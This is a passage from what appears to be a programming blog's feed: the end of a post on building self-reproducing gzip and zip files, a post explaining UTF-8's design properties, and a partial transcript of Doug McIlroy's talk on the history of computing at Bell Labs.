0.8em;"><i>s</i>+1</span></span><code><span style="color: #005500"> [S]</span></code></td> <td></td> <td><code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code> [S]</code></td> </tr> <tr> <td align=right><span style="font-size: 0.8em;"><i>repeat last </i>s<i>+1 bytes</i></span></td> <td></td> <td><code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code></code></td> <td></td> <td><code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code> [S]</code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">print suffix</span></i></td> <td></td> <td><code>[S]</code></td> <td></td> <td><code>S</code></td> </tr> </table> </center> <br> <p class=lp> (The byte sequence in the Output column is <code><i>P</i></code>, then the byte sequence from the Code column, then <code><i>S</i></code>.) </p> <h3>Self-reproducing zip files</h3> <p class=pp> Now the rubber meets the road. We've solved the main theoretical obstacle to making a self-reproducing zip file, but there are a couple practical obstacles still in our way. </p> <p class=pp> The first obstacle is to translate our self-reproducing Lempel-Ziv program, written in simplified opcodes, into the real opcode encoding. <a href="http://www.ietf.org/rfc/rfc1951.txt">RFC 1951</a> describes the DEFLATE format used in both gzip and zip: a sequence of blocks, each of which is a sequence of opcodes encoded using Huffman codes. Huffman codes assign different length bit strings to different opcodes, breaking our assumption above that opcodes have fixed length. But wait! We can, with some care, find a set of fixed-size encodings that says what we need to be able to express. </p> <p class=pp> In DEFLATE, there are literal blocks and opcode blocks. The header at the beginning of a literal block is 5 bytes: </p> <center> <img src="http://research.swtch.com/zip1.png"> </center> <p class=pp> If the translation of our <code>L</code> opcodes above are 5 bytes each, the translation of the <code>R</code> opcodes must also be 5 bytes each, with all the byte counts above scaled by a factor of 5. (For example, <code>L4</code> now has a 20-byte argument, and <code>R4</code> repeats the last 20 bytes of output.) The opcode block with a single <code>repeat(20,20)</code> instruction falls well short of 5 bytes: </p> <center> <img src="http://research.swtch.com/zip2.png"> </center> <p class=lp>Luckily, an opcode block containing two <code>repeat(20,10)</code> instructions has the same effect and is exactly 5 bytes: </p> <center> <img src="http://research.swtch.com/zip3.png"> </center> <p class=lp> Encoding the other sized repeats (<code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span> and <code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span>) takes more effort and some sleazy tricks, but it turns out that we can design 5-byte codes that repeat any amount from 9 to 64 bytes. For example, here are the repeat blocks for 10 bytes and for 40 bytes: </p> <center> <img src="http://research.swtch.com/zip4.png"> <br> <img src="http://research.swtch.com/zip5.png"> </center> <p class=lp> The repeat block for 10 bytes is two bits too short, but every repeat block is followed by a literal block, which starts with three zero bits and then padding to the next byte boundary. If a repeat block ends two bits short of a byte but is followed by a literal block, the literal block's padding will insert the extra two bits. Similarly, the repeat block for 40 bytes is five bits too long, but they're all zero bits. Starting a literal block five bits too late steals the bits from the padding. Both of these tricks only work because the last 7 bits of any repeat block are zero and the bits in the first byte of any literal block are also zero, so the boundary isn't directly visible. If the literal block started with a one bit, this sleazy trick wouldn't work. </p> <p class=pp>The second obstacle is that zip archives (and gzip files) record a CRC32 checksum of the uncompressed data. Since the uncompressed data is the zip archive, the data being checksummed includes the checksum itself. So we need to find a value <i>x</i> such that writing <i>x</i> into the checksum field causes the file to checksum to <i>x</i>. Recursion strikes back. </p> <p class=pp> The CRC32 checksum computation interprets the entire file as a big number and computes the remainder when you divide that number by a specific constant using a specific kind of division. We could go through the effort of setting up the appropriate equations and solving for <i>x</i>. But frankly, we've already solved one nasty recursive puzzle today, and <a href="http://www.youtube.com/watch?v=TQBLTB5f3j0">enough is enough</a>. There are only four billion possibilities for <i>x</i>: we can write a program to try each in turn, until it finds one that works. </p> <p class=pp> If you want to recreate these files yourself, there are a few more minor obstacles, like making sure the tar file is a multiple of 512 bytes and compressing the rather large zip trailer to at most 59 bytes so that <code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span> is at most <code>R</code><span style="font-size: 0.8em;">64</span>. But they're just a simple matter of programming. </p> <p class=pp> So there you have it: <code><a href="http://swtch.com/r.gz">r.gz</a></code> (gzip files all the way down), <code><a href="http://swtch.com/r.tar.gz">r.tar.gz</a></code> (gzipped tar files all the way down), and <code><a href="http://swtch.com/r.zip">r.zip</a></code> (zip files all the way down). I regret that I have been unable to find any programs that insist on decompressing these files recursively, ad infinitum. It would have been fun to watch them squirm, but it looks like much less sophisticated <a href="http://en.wikipedia.org/wiki/Zip_bomb">zip bombs</a> have spoiled the fun. </p> <p class=pp> If you're feeling particularly ambitious, here is <a href="http://swtch.com/rgzip.go">rgzip.go</a>, the <a href="http://golang.org/">Go</a> program that generated these files. I wonder if you can create a zip file that contains a gzipped tar file that contains the original zip file. Ken Thompson suggested trying to make a zip file that contains a slightly larger copy of itself, recursively, so that as you dive down the chain of zip files each one gets a little bigger. (If you do manage either of these, please leave a comment.) </p> <br> <p class=lp><font size=-1>P.S. I can't end the post without sharing my favorite self-reproducing program: the one-line shell script <code>#!/bin/cat</code></font>. </p></p> </div> </div> </div> UTF-8: Bits, Bytes, and Benefits tag:research.swtch.com,2012:research.swtch.com/utf8 2010-03-05T00:00:00-05:00 2010-03-05T00:00:00-05:00 The reasons to switch to UTF-8 <p><p class=pp> UTF-8 is a way to encode Unicode code points&#8212;integer values from 0 through 10FFFF&#8212;into a byte stream, and it is far simpler than many people realize. The easiest way to make it confusing or complicated is to treat it as a black box, never looking inside. So let's start by looking inside. Here it is: </p> <center> <table cellspacing=5 cellpadding=0 border=0> <tr height=10><th colspan=4></th></tr> <tr><th align=center colspan=2>Unicode code points</th><th width=10><th align=center>UTF-8 encoding (binary)</th></tr> <tr height=10><td colspan=4></td></tr> <tr><td align=right>00-7F</td><td>(7 bits)</td><td></td><td align=right>0<i>tuvwxyz</i></td></tr> <tr><td align=right>0080-07FF</td><td>(11 bits)</td><td></td><td align=right>110<i>pqrst</i>&nbsp;10<i>uvwxyz</i></td></tr> <tr><td align=right>0800-FFFF</td><td>(16 bits)</td><td></td><td align=right>1110<i>jklm</i>&nbsp;10<i>npqrst</i>&nbsp;10<i>uvwxyz</i></td></tr> <tr><td align=right valign=top>010000-10FFFF</td><td>(21 bits)</td><td></td><td align=right valign=top>11110<i>efg</i>&nbsp;10<i>hijklm</i> 10<i>npqrst</i>&nbsp;10<i>uvwxyz</i></td> <tr height=10><td colspan=4></td></tr> </table> </center> <p class=lp> The convenient properties of UTF-8 are all consequences of the choice of encoding. </p> <ol> <li><i>All ASCII files are already UTF-8 files.</i><br> The first 128 Unicode code points are the 7-bit ASCII character set, and UTF-8 preserves their one-byte encoding. </li> <li><i>ASCII bytes always represent themselves in UTF-8 files. They never appear as part of other UTF-8 sequences.</i><br> All the non-ASCII UTF-8 sequences consist of bytes with the high bit set, so if you see the byte 0x7A in a UTF-8 file, you can be sure it represents the character <code>z</code>. </li> <li><i>ASCII bytes are always represented as themselves in UTF-8 files. They cannot be hidden inside multibyte UTF-8 sequences.</i><br> The ASCII <code>z</code> 01111010 cannot be encoded as a two-byte UTF-8 sequence 11000001 10111010</code>. Code points must be encoded using the shortest possible sequence. A corollary is that decoders must detect long-winded sequences as invalid. In practice, it is useful for a decoder to use the Unicode replacement character, code point FFFD, as the decoding of an invalid UTF-8 sequence rather than stop processing the text. </li> <li><i>UTF-8 is self-synchronizing.</i><br> Let's call a byte of the form 10<i>xxxxxx</i> a continuation byte. Every UTF-8 sequence is a byte that is not a continuation byte followed by zero or more continuation bytes. If you start processing a UTF-8 file at an arbitrary point, you might not be at the beginning of a UTF-8 encoding, but you can easily find one: skip over continuation bytes until you find a non-continuation byte. (The same applies to scanning backward.) </li> <li><i>Substring search is just byte string search.</i><br> Properties 2, 3, and 4 imply that given a string of correctly encoded UTF-8, the only way those bytes can appear in a larger UTF-8 text is when they represent the same code points. So you can use any 8-bit safe byte at a time search function, like <code>strchr</code> or <code>strstr</code>, to run the search. </li> <li><i>Most programs that handle 8-bit files safely can handle UTF-8 safely.</i><br> This also follows from Properties 2, 3, and 4. I say &ldquo;most&rdquo; programs, because programs that take apart a byte sequence expecting one character per byte will not behave correctly, but very few programs do that. It is far more common to split input at newline characters, or split whitespace-separated fields, or do other similar parsing around specific ASCII characters. For example, Unix tools like cat, cmp, cp, diff, echo, head, tail, and tee can process UTF-8 files as if they were plain ASCII files. Most operating system kernels should also be able to handle UTF-8 file names without any special arrangement, since the only operations done on file names are comparisons and splitting at <code>/</code>. In contrast, tools like grep, sed, and wc, which inspect arbitrary individual characters, do need modification. </li> <li><i>UTF-8 sequences sort in code point order.</i><br> You can verify this by inspecting the encodings in the table above. This means that Unix tools like join, ls, and sort (without options) don't need to handle UTF-8 specially. </li> <li><i>UTF-8 has no &ldquo;byte order.&rdquo;</i><br> UTF-8 is a byte encoding. It is not little endian or big endian. Unicode defines a byte order mark (BOM) code point FFFE, which are used to determine the byte order of a stream of raw 16-bit values, like UCS-2 or UTF-16. It has no place in a UTF-8 file. Some programs like to write a UTF-8-encoded BOM at the beginning of UTF-8 files, but this is unnecessary (and annoying to programs that don't expect it). </li> </ol> <p class=lp> UTF-8 does give up the ability to do random access using code point indices. Programs that need to jump to the <i>n</i>th Unicode code point in a file or on a line&#8212;text editors are the canonical example&#8212;will typically convert incoming UTF-8 to an internal representation like an array of code points and then convert back to UTF-8 for output, but most programs are simpler when written to manipulate UTF-8 directly. </p> <p class=pp> Programs that make UTF-8 more complicated than it needs to be are typically trying to be too general, not wanting to make assumptions that might not be true of other encodings. But there are good tools to convert other encodings to UTF-8, and it is slowly becoming the standard encoding: even the fraction of web pages written in UTF-8 is <a href="http://googleblog.blogspot.com/2010/01/unicode-nearing-50-of-web.html">nearing 50%</a>. UTF-8 was explicitly designed to have these nice properties. Take advantage of them. </p> <p class=pp> For more on UTF-8, see &ldquo;<a href="https://9p.io/sys/doc/utf.html">Hello World or Καλημέρα κόσμε or こんにちは 世界</a>,&rdquo; by Rob Pike and Ken Thompson, and also this <a href="http://www.cl.cam.ac.uk/~mgk25/ucs/utf-8-history.txt">history</a>. </p> <br> <font size=-1> <p class=lp> Notes: Property 6 assumes the tools do not strip the high bit from each byte. Such mangling was common years ago but is very uncommon now. Property 7 assumes the comparison is done treating the bytes as unsigned, but such behavior is mandated by the ANSI C standard for <code>memcmp</code>, <code>strcmp</code>, and <code>strncmp</code>. </p> </font></p> Computing History at Bell Labs tag:research.swtch.com,2012:research.swtch.com/bell-labs 2008-04-09T00:00:00-04:00 2008-04-09T00:00:00-04:00 Doug McIlroy’s rememberances <p><p class=pp> In 1997, on his retirement from Bell Labs, <a href="http://www.cs.dartmouth.edu/~doug/">Doug McIlroy</a> gave a fascinating talk about the &ldquo;<a href="https://web.archive.org/web/20081022192943/http://cm.bell-labs.com/cm/cs/doug97.html"><b>History of Computing at Bell Labs</b></a>.&rdquo; Almost ten years ago I transcribed the audio but never did anything with it. The transcript is below. </p> <p class=pp> My favorite parts of the talk are the description of the bi-quinary decimal relay calculator and the description of a team that spent over a year tracking down a race condition bug in a missile detector (reliability was king: today you’d just stamp &ldquo;cannot reproduce&rdquo; and send the report back). But the whole thing contains many fantastic stories. It’s well worth the read or listen. I also like his recollection of programming using cards: &ldquo;It’s the kind of thing you can be nostalgic about, but it wasn’t actually fun.&rdquo; </p> <p class=pp> For more information, Bernard D. Holbrook and W. Stanley Brown’s 1982 technical report &ldquo;<a href="cstr99.pdf">A History of Computing Research at Bell Laboratories (1937-1975)</a>&rdquo; covers the earlier history in more detail. </p> <p><i>Corrections added August 19, 2009. Links updated May 16, 2018.</i></p> <p><i>Update, December 19, 2020.</i> The original audio files disappeared along with the rest of the Bell Labs site some time ago, but I discovered a saved copy on one of my computers: [<a href="mcilroy97history.mp3">MP3</a> | <a href="mcilroy97history.rm">original RealAudio</a>]. I also added a few corrections and notes from Doug McIlroy, dated 2015 [sic].</p> <br> <br> <p class=lp><b>Transcript</b></p> <p class=pp> Computing at Bell Labs is certainly an outgrowth of the <a href="https://web.archive.org/web/20080622172015/http://cm.bell-labs.com/cm/ms/history/history.html">mathematics department</a>, which grew from that first hiring in 1897, G A Campbell. When Bell Labs was formally founded in 1925, what it had been was the engineering department of Western Electric. When it was formally founded in 1925, almost from the beginning there was a math department with Thornton Fry as the department head, and if you look at some of Fry’s work, it turns out that he was fussing around in 1929 with trying to discover information theory. It didn’t actually gel until twenty years later with Shannon.</p> <p class=pp><span style="font-size: 0.7em;">1:10</span> Of course, most of the mathematics at that time was continuous. One was interested in analyzing circuits and propagation. And indeed, this is what led to the growth of computing in Bell Laboratories. The computations could not all be done symbolically. There were not closed form solutions. There was lots of numerical computation done. The math department had a fair stable of computers, which in those days meant people. [laughter]</p> <p class=pp><span style="font-size: 0.7em;">2:00</span> And in the late ’30s, <a href="http://en.wikipedia.org/wiki/George_Stibitz">George Stibitz</a> had an idea that some of the work that they were doing on hand calculators might be automated by using some of the equipment that the Bell System was installing in central offices, namely relay circuits. He went home, and on his kitchen table, he built out of relays a binary arithmetic circuit. He decided that binary was really the right way to compute. However, when he finally came to build some equipment, he determined that binary to decimal conversion and decimal to binary conversion was a drag, and he didn’t want to put it in the equipment, and so he finally built in 1939, a relay calculator that worked in decimal, and it worked in complex arithmetic. Do you have a hand calculator now that does complex arithmetic? Ten-digit, I believe, complex computations: add, subtract, multiply, and divide. The I/O equipment was teletypes, so essentially all the stuff to make such machines out of was there. Since the I/O was teletypes, it could be remotely accessed, and there were in fact four stations in the West Street Laboratories of Bell Labs. West Street is down on the left side of Manhattan. I had the good fortune to work there one summer, right next to a district where you’re likely to get bowled over by rolling beeves hanging from racks or tumbling cabbages. The building is still there. It’s called <a href="http://query.nytimes.com/gst/fullpage.html?res=950DE3DB1F38F931A35751C0A96F948260">Westbeth Apartments</a>. It’s now an artist’s colony.</p> <p class=pp><span style="font-size: 0.7em;">4:29</span> Anyway, in West Street, there were four separate remote stations from which the complex calculator could be accessed. It was not time sharing. You actually reserved your time on the machine, and only one of the four terminals worked at a time. In 1940, this machine was shown off to the world at the AMS annual convention, which happened to be held in Hanover at Dartmouth that year, and mathematicians could wonder at remote computing, doing computation on an electromechanical calculator at 300 miles away.</p> <p class=pp><span style="font-size: 0.7em;">5:22</span> Stibitz went on from there to make a whole series of relay machines. Many of them were made for the government during the war. They were named, imaginatively, Mark I through Mark VI. I have read some of his patents. They’re kind of fun. One is a patent on conditional transfer. [laughter] And how do you do a conditional transfer? Well these gadgets were, the relay calculator was run from your fingers, I mean the complex calculator. The later calculators, of course, if your fingers were a teletype, you could perfectly well feed a paper tape in, because that was standard practice. And these later machines were intended really to be run more from paper tape. And the conditional transfer was this: you had two teletypes, and there’s a code that says "time to read from the other teletype". Loops were of course easy to do. You take paper and [laughter; presumably Doug curled a piece of paper to form a physical loop]. These machines never got to the point of having stored programs. But they got quite big. I saw, one of them was here in 1954, and I did see it, behind glass, and if you’ve ever seen these machines in the, there’s one in the Franklin Institute in Philadelphia, and there’s one in the Science Museum in San Jose, you know these machines that drop balls that go wandering sliding around and turning battle wheels and ringing bells and who knows what. It kind of looked like that. It was a very quiet room, with just a little clicking of relays, which is what a central office used to be like. It was the one air-conditioned room in Murray Hill, I think. This machine ran, the Mark VI, well I think that was the Mark V, the Mark VI actually went to Aberdeen. This machine ran for a good number of years, probably six, eight. And it is said that it never made an undetected error. [laughter]</p> <p class=pp><span style="font-size: 0.7em;">8:30</span> What that means is that it never made an error that it did not diagnose itself and stop. Relay technology was very very defensive. The telephone switching system had to work. It was full of self-checking, and so were the calculators, so were the calculators that Stibitz made.</p> <p class=pp><span style="font-size: 0.7em;">9:04</span> Arithmetic was done in bi-quinary, a two out of five representation for decimal integers, and if there weren’t exactly two out of five relays activated it would stop. This machine ran unattended over the weekends. People would bring their tapes in, and the operator would paste everybody’s tapes together. There was a beginning of job code on the tape and there was also a time indicator. If the machine ran out of time, it automatically stopped and went to the next job. If the machine caught itself in an error, it backed up to the current job and tried it again. They would load this machine on Friday night, and on Monday morning, all the tapes, all the entries would be available on output tapes.</p> <p class=pp>Question: I take it they were using a different representation for loops and conditionals by then.</p> <p class=pp>Doug: Loops were done actually by they would run back and forth across the tape now, on this machine.</p> <p class=pp><span style="font-size: 0.7em;">10:40</span> Then came the transistor in ’48. At Whippany, they actually had a transistorized computer, which was a respectable minicomputer, a box about this big, running in 1954, it ran from 1954 to 1956 solidly as a test run. The notion was that this computer might fly in an airplane. And during that two-year test run, one diode failed. In 1957, this machine called <a href="http://www.cedmagic.com/history/tradic-transistorized.html">TRADIC</a>, did in fact fly in an airplane, but to the best of my knowledge, that machine was a demonstration machine. It didn’t turn into a production machine. About that time, we started buying commercial machines. It’s wonderful to think about the set of different architectures that existed in that time. The first machine we got was called a <a href="http://www.columbia.edu/acis/history/cpc.html">CPC from IBM</a>. And all it was was a big accounting machine with a very special plugboard on the side that provided an interpreter for doing ten-digit decimal arithmetic, including opcodes for the trig functions and square root.</p> <p class=pp><span style="font-size: 0.7em;">12:30</span> It was also not a computer as we know it today, because it wasn’t stored program, it had twenty-four memory locations as I recall, and it took its program instead of from tapes, from cards. This was not a total advantage. A tape didn’t get into trouble if you dropped it on the floor. [laughter]. CPC, the operator would stand in front of it, and there, you would go through loops by taking cards out, it took human intervention, to take the cards out of the output of the card reader and put them in the ?top?. I actually ran some programs on the CPC ?...?. It’s the kind of thing you can be nostalgic about, but it wasn’t actually fun. [laughter]</p> <p class=pp><span style="font-size: 0.7em;">13:30</span> The next machine was an <a href="http://www.columbia.edu/acis/history/650.html">IBM 650</a>, and here, this was a stored program, with the memory being on drum. There was no operating system for it. It came with a manual: this is what the machine does. And Michael Wolontis made an interpreter called the <a href="http://hopl.info/showlanguage2.prx?exp=6497">L1 interpreter</a> for this machine, so you could actually program in, the manual told you how to program in binary, and L1 allowed you to give something like 10 for add and 9 for subtract, and program in decimal instead. And of course that machine required interesting optimization, because it was a nice thing if the next program step were stored somewhere -- each program step had the address of the following step in it, and you would try to locate them around the drum so to minimize latency. So there were all kinds of optimizers around, but I don’t think Bell Labs made ?...? based on this called "soap" from Carnegie Mellon. That machine didn’t last very long. Fortunately, a machine with core memory came out from IBM in about ’56, the 704. Bell Labs was a little slow in getting one, in ’58. Again, the machine came without an operating system. In fact, but it did have Fortran, which really changed the world. It suddenly made it easy to write programs. But the way Fortran came from IBM, it came with a thing called the Fortran Stop Book. This was a list of what happened, a diagnostic would execute the halt instruction, the operator would go read the panel lights and discover where the machine had stopped, you would then go look up in the stop book what that meant. Bell Labs, with George Mealy and Gwen Hanson, made an operating system, and one of the things they did was to bring the stop book to heel. They took the compiler, replaced all the stop instructions with jumps to somewhere, and allowed the program instead of stopping to go on to the next trial. By the time I arrived at Bell Labs in 1958, this thing was running nicely.</p> <p class=pp>[<i>McIlroy comments, 2015</i>: I’m pretty sure I was wrong in saying Mealy and Hanson brought the stop book to heel. They built the OS, but I believe Dolores Leagus tamed Fortran. (Dolores was the most accurate programmer I ever knew. She’d write 2000 lines of code before testing a single line--and it would work.)]</p> <p class=pp><span style="font-size: 0.7em;">16:36</span> Bell Labs continued to be a major player in operating systems. This was called BESYS. BE was the SHARE abbreviation for Bell Labs. Each company that belonged to Share, which was the IBM users group, ahd a two letter abbreviation. It’s hard to imagine taking all the computer users now and giving them a two-letter abbreviation. BESYS went through many generations, up to BESYS 5, I believe. Each one with innovations. IBM delivered a machine, the 7090, in 1960. This machine had interrupts in it, but IBM didn’t use them. But BESYS did. And that sent IBM back to the drawing board to make it work. [Laughter]</p> <p class=pp><span style="font-size: 0.7em;">17:48</span> Rob Pike: It also didn’t have memory protection.</p> <p class=pp>Doug: It didn’t have memory protection either, and a lot of people actually got IBM to put memory protection in the 7090, so that one could leave the operating system resident in the presence of a wild program, an idea that the PC didn’t discover until, last year or something like that. [laughter]</p> <p class=pp>Big players then, <a href="http://en.wikipedia.org/wiki/Richard_Hamming">Dick Hamming</a>, a name that I’m sure everybody knows, was sort of the numerical analysis guru, and a seer. He liked to make outrageous predictions. He predicted in 1960, that half of Bell Labs was going to be busy doing something with computers eventually. ?...? exaggerating some ?...? abstract in his thought. He was wrong. Half was a gross underestimate. Dick Hamming retired twenty years ago, and just this June he completed his full twenty years term in the Navy, which entitles him again to retire from the Naval Postgraduate Institute in Monterey. Stibitz, incidentally died, I think within the last year. He was doing medical instrumentation at Dartmouth essentially, near the end.</p> <p class=pp>[<i>McIlroy comments, 2015</i>: I’m not sure what exact unintelligible words I uttered about Dick Hamming. When he predicted that half the Bell Labs budget would be related to computing in a decade, people scoffed in terms like &ldquo;that’s just Dick being himelf, exaggerating for effect&rdquo;.]</p> <p class=pp><span style="font-size: 0.7em;">20:00</span> Various problems intrigued, besides the numerical problems, which in fact were stock in trade, and were the real justification for buying machines, until at least the ’70s I would say. But some non-numerical problems had begun to tickle the palette of the math department. Even G A Campbell got interested in graph theory, the reason being he wanted to think of all the possible ways you could take the three wires and the various parts of the telephone and connect them together, and try permutations to see what you could do about reducing sidetone by putting things into the various parts of the circuit, and devised every possibly way of connecting the telephone up. And that was sort of the beginning of combinatorics at Bell Labs. John Reardon, a mathematician parlayed this into a major subject. Two problems which are now deemed as computing problems, have intrigued the math department for a very long time, and those are the minimum spanning tree problem, and the wonderfully ?comment about Joe Kruskal, laughter?</p> <p class=pp><span style="font-size: 0.7em;">21:50</span> And in the 50s Bob Prim and Kruskal, who I don’t think worked on the Labs at that point, invented algorithms for the minimum spanning tree. Somehow or other, computer scientists usually learn these algorithms, one of the two at least, as Dijkstra’s algorithm, but he was a latecomer.</p> <p class=pp>[<i>McIlroy comments, 2015</i>: I erred in attributing Dijkstra’s algorithm to Prim and Kruskal. That honor belongs to yet a third member of the math department: Ed Moore. (Dijkstra’s algorithm is for shortest path, not spanning tree.)]</p> <p class=pp>Another pet was the traveling salesman. There’s been a long list of people at Bell Labs who played with that: Shen Lin and Ron Graham and David Johnson and dozens more, oh and ?...?. And then another problem is the Steiner minimum spanning tree, where you’re allowed to add points to the graph. Every one of these problems grew, actually had a justification in telephone billing. One jurisdiction or another would specify that the way you bill for a private line network was in one jurisdiction by the minimum spanning tree. In another jurisdiction, by the traveling salesman route. NP-completeness wasn’t a word in the vocabulary of lawmakers [laughter]. And the <a href="http://en.wikipedia.org/wiki/Steiner_tree">Steiner problem</a> came up because customers discovered they could beat the system by inventing offices in the middle of Tennessee that had nothing to do with their business, but they could put the office at a Steiner point and reduce their phone bill by adding to what the service that the Bell System had to give them. So all of these problems actually had some justification in billing besides the fun.</p> <p class=pp><span style="font-size: 0.7em;">24:15</span> Come the 60s, we actually started to hire people for computing per se. I was perhaps the third person who was hired with a Ph.D. to help take care of the computers and I’m told that the then director and head of the math department, Hendrick Bode, had said to his people, "yeah, you can hire this guy, instead of a real mathematician, but what’s he gonna be doing in five years?" [laughter]</p> <p class=pp><span style="font-size: 0.7em;">25:02</span> Nevertheless, we started hiring for real in about ’67. Computer science got split off from the math department. I had the good fortune to move into the office that I’ve been in ever since then. Computing began to make, get a personality of its own. One of the interesting people that came to Bell Labs for a while was Hao Wang. Is his name well known? [Pause] One nod. Hao Wang was a philosopher and logician, and we got a letter from him in England out of the blue saying "hey you know, can I come and use your computers? I have an idea about theorem proving." There was theorem proving in the air in the late 50s, and it was mostly pretty thin stuff. Obvious that the methods being proposed wouldn’t possibly do anything more difficult than solve tic-tac-toe problems by enumeration. Wang had a notion that he could mechanically prove theorems in the style of Whitehead and Russell’s great treatise Principia Mathematica in the early patr of the century. He came here, learned how to program in machine language, and took all of Volume I of Principia Mathematica -- if you’ve ever hefted Principia, well that’s about all it’s good for, it’s a real good door stop. It’s really big. But it’s theorem after theorem after theorem in propositional calculus. Of course, there’s a decision procedure for propositional calculus, but he was proving them more in the style of Whitehead and Russell. And when he finally got them all coded and put them into the computer, he proved the entire contents of this immense book in eight minutes. This was actually a neat accomplishment. Also that was the beginning of all the language theory. We hired people like <a href="http://www1.cs.columbia.edu/~aho/">Al Aho</a> and <a href="http://infolab.stanford.edu/~ullman/">Jeff Ullman</a>, who probed around every possible model of grammars, syntax, and all of the things that are now in the standard undergraduate curriculum, were pretty well nailed down here, on syntax and finite state machines and so on were pretty well nailed down in the 60s. Speaking of finite state machines, in the 50s, both Mealy and Moore, who have two of the well-known models of finite state machines, were here.</p> <p class=pp><span style="font-size: 0.7em;">28:40</span> During the 60s, we undertook an enormous development project in the guise of research, which was <a href="http://www.multicians.org/">MULTICS</a>, and it was the notion of MULTICS was computing was the public utility of the future. Machines were very expensive, and ?indeed? like you don’t own your own electric generator, you rely on the power company to do generation for you, and it was seen that this was a good way to do computing -- time sharing -- and it was also recognized that shared data was a very good thing. MIT pioneered this and Bell Labs joined in on the MULTICS project, and this occupied five years of system programming effort, until Bell Labs pulled out, because it turned out that MULTICS was too ambitious for the hardware at the time, and also with 80 people on it was not exactly a research project. But, that led to various people who were on the project, in particular <a href="http://en.wikipedia.org/wiki/Ken_Thompson">Ken Thompson</a> -- right there -- to think about how to -- <a href="http://en.wikipedia.org/wiki/Dennis_Ritchie">Dennis Ritchie</a> and Rudd Canaday were in on this too -- to think about how you might make a pleasant operating system with a little less resources.</p> <p class=pp><span style="font-size: 0.7em;">30:30</span> And Ken found -- this is a story that’s often been told, so I won’t go into very much of unix -- Ken found an old machine cast off in the corner, the <a href="http://en.wikipedia.org/wiki/GE-600_series">PDP-7</a>, and put up this little operating system on it, and we had immense <a href="http://en.wikipedia.org/wiki/GE-600_series">GE635</a> available at the comp center at the time, and I remember as the department head, muscling in to use this little computer to be, to get to be Unix’s first user, customer, because it was so much pleasanter to use this tiny machine than it was to use the big and capable machine in the comp center. And of course the rest of the story is known to everybody and has affected all college campuses in the country.</p> <p class=pp><span style="font-size: 0.7em;">31:33</span> Along with the operating system work, there was a fair amount of language work done at Bell Labs. Often curious off-beat languages. One of my favorites was called <a href="http://hopl.murdoch.edu.au/showlanguage.prx?exp=6937&language=BLODI-B">Blodi</a>, B L O D I, a block diagram compiler by Kelly and Vyssotsky. Perhaps the most interesting early uses of computers in the sense of being unexpected, were those that came from the acoustics research department, and what the Blodi compiler was invented in the acoustic research department for doing digital simulations of sample data system. DSPs are classic sample data systems, where instead of passing analog signals around, you pass around streams of numerical values. And Blodi allowed you to say here’s a delay unit, here’s an amplifier, here’s an adder, the standard piece parts for a sample data system, and each one was described on a card, and with description of what it’s wired to. It was then compiled into one enormous single straight line loop for one time step. Of course, you had to rearrange the code because some one part of the sample data system would feed another and produce really very efficient 7090 code for simulating sample data systems. By in large, from that time forth, the acoustic department stopped making hardware. It was much easier to do signal processing digitally than previous ways that had been analog. Blodi had an interesting property. It was the only programming language I know where -- this is not my original observation, Vyssotsky said -- where you could take the deck of cards, throw it up the stairs, and pick them up at the bottom of the stairs, feed them into the computer again, and get the same program out. Blodi had two, aside from syntax diagnostics, it did have one diagnostic when it would fail to compile, and that was "somewhere in your system is a loop that consists of all delays or has no delays" and you can imagine how they handled that.</p> <p class=pp><span style="font-size: 0.7em;">35:09</span> Another interesting programming language of the 60s was <a href="http://www.knowltonmosaics.com/">Ken Knowlten</a>’s <a href="http://beflix.com/beflix.php">Beflix</a>. This was for making movies on something with resolution kind of comparable to 640x480, really coarse, and the programming notion in here was bugs. You put on your grid a bunch of bugs, and each bug carried along some data as baggage, and then you would do things like cellular automata operations. You could program it or you could kind of let it go by itself. If a red bug is next to a blue bug then it turns into a green bug on the following step and so on. <span style="font-size: 0.7em;">36:28</span> He and Lillian Schwartz made some interesting abstract movies at the time. It also did some interesting picture processing. One wonderful picture of a reclining nude, something about the size of that blackboard over there, all made of pixels about a half inch high each with a different little picture in it, picked out for their density, and so if you looked at it close up it consisted of pickaxes and candles and dogs, and if you looked at it far enough away, it was a <a href="http://blog.the-eg.com/2007/12/03/ken-knowlton-mosaics/">reclining nude</a>. That picture got a lot of play all around the country.</p> <p class=pp>Lorinda Cherry: That was with Leon, wasn’t it? That was with <a href="https://en.wikipedia.org/wiki/Leon_Harmon">Leon Harmon</a>.</p> <p class=pp>Doug: Was that Harmon?</p> <p class=pp>Lorinda: ?...?</p> <p class=pp>Doug: Harmon was also an interesting character. He did more things than pictures. I’m glad you reminded me of him. I had him written down here. Harmon was a guy who among other things did a block diagram compiler for writing a handwriting recognition program. I never did understand how his scheme worked, and in fact I guess it didn’t work too well. [laughter] It didn’t do any production ?things? but it was an absolutely immense sample data circuit for doing handwriting recognition. Harmon’s most famous work was trying to estimate the information content in a face. And every one of these pictures which are a cliche now, that show a face digitized very coarsely, go back to Harmon’s <a href="https://web.archive.org/web/20080807162812/http://www.doubletakeimages.com/history.htm">first psychological experiments</a>, when he tried to find out how many bits of picture he needed to try to make a face recognizable. He went around and digitized about 256 faces from Bell Labs and did real psychological experiments asking which faces could be distinguished from other ones. I had the good fortune to have one of the most distinguishable faces, and consequently you’ll find me in freshman psychology texts through no fault of my own.</p> <p class=pp><span style="font-size: 0.7em;">39:15</span> Another thing going on the 60s was the halting beginning here of interactive computing. And again the credit has to go to the acoustics research department, for good and sufficient reason. They wanted to be able to feed signals into the machine, and look at them, and get them back out. They bought yet another weird architecture machine called the <a href="http://www.piercefuller.com/library/pb250.html">Packard Bell 250</a>, where the memory elements were <a href="http://en.wikipedia.org/wiki/Delay_line_memory">mercury delay lines</a>.</p> <p class=pp>Question: Packard Bell?</p> <p class=pp>Doug: Packard Bell, same one that makes PCs today.</p> <p class=pp><span style="font-size: 0.7em;">40:10</span> They hung this off of the comp center 7090 and put in a scheme for quickly shipping jobs into the job stream on the 7090. The Packard Bell was the real-time terminal that you could play with and repair stuff, ?...? off the 7090, get it back, and then you could play it. From that grew some graphics machines also, built by ?...? et al. And it was one of the old graphics machines in fact that Ken picked up to build Unix on.</p> <p class=pp><span style="font-size: 0.7em;">40:55</span> Another thing that went on in the acoustics department was synthetic speech and music. <a 